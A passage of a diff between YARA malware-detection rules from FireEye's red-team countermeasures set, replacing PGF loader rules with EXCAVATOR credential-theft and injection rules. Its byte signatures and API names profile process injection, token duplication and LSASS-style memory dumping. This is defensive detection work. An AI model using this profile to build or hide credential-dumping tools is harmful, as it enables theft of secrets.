"3bb34ebd93b8ab5799f4843e8cc829fa" - logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b" + hash = "b66347ef110e60b064474ae746701d4a" + logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789" score = 75 quality = 75 tags = "FILE" - rev = 4 + rev = 1 strings: - $cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } - $cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 } - $cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } - $cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } + $api1 = "VirtualAllocEx" fullword + $api2 = "UpdateProcThreadAttribute" fullword + $api3 = "DuplicateTokenEx" fullword + $api4 = "CreateProcessAsUserA" fullword + $inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 } + $process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 } + $token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and any of them + (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them } -rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE +rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6" + id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff" date = "2020-11-26" date = "2020-11-26" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4414953fa397a41156f6fa4f9462d207" - logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8" + hash = "f7d9961463b5110a3d70ee2e97842ed3" + logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 2 strings: - $sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 } - $sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C } + $api1 = "VirtualAllocEx" fullword + $api2 = "UpdateProcThreadAttribute" fullword + $api3 = "DuplicateTokenEx" fullword + $api4 = "CreateProcessAsUserA" fullword + $inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 } + $process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 } + $token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them } -rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE +rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE { meta: - description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py" + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507" - date = "2020-11-25" - date = "2020-11-25" + id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "7c2a06ceb29cdb25f24c06f2a8892fba" - logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03" + hash = "4fd62068e591cbd6f413e1c2b8f75442" + logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 } - $ss1 = "\x00CreateThread\x00" - $ss2 = "\x00ScriptObjectStackTop\x00" - $ss3 = "\x00Microsoft.JScript\x00" + $api1 = "PssCaptureSnapshot" fullword + $api2 = "MiniDumpWriteDump" fullword + $dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 } + $enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them } -rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE +rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE { meta: - description = "PE rich header matches PGF backdoor" + description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL." author = "FireEye" - id = "595c9e2a-3d9d-5366-9449-de1bcf333f78" + id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "226b1ac427eb5a4dc2a00cc72c163214" - logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811" + hash = "6a9a114928554c26675884eeb40cc01b" + logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03" score = 75 quality = 75 tags = "FILE" - md5_2 = "2398ed2d5b830d226af26dedaf30f64a" - md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b" - md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa" - rev = 4 + rev = 3 strings: - $rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 } - $rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 